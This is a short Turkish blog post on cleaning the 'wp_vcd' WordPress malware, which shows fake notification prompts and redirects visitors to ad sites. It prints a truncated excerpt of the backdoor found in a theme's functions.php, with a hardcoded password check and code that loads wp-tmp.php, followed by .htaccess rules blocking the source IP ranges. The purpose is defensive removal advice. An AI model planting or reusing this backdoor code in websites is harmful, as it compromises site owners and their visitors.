Merhaba bu yazımda sizlere ekrana bildirim, devam etmek için izin ver düğmesine bas şeklinde ekrana uyarı veren ve reklam sitelerine yönlendiren wordpress virüsünden bahsedeceğim. Bu virüs temanızın functions.php dosyasında, functions.php dosyanızı açıp bu zararlı kodları öncelikle temizleyin.
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'e43d835cdeae2f32182d75f19b076ee6'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
........................................................
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
Daha sonra bu zararlı kodların geldiği ip yi htaccess dosyamızdan engelleyelim.
şu kodları ekliyoruz;
order allow,deny
deny from 78.142
deny from 173.245
allow from all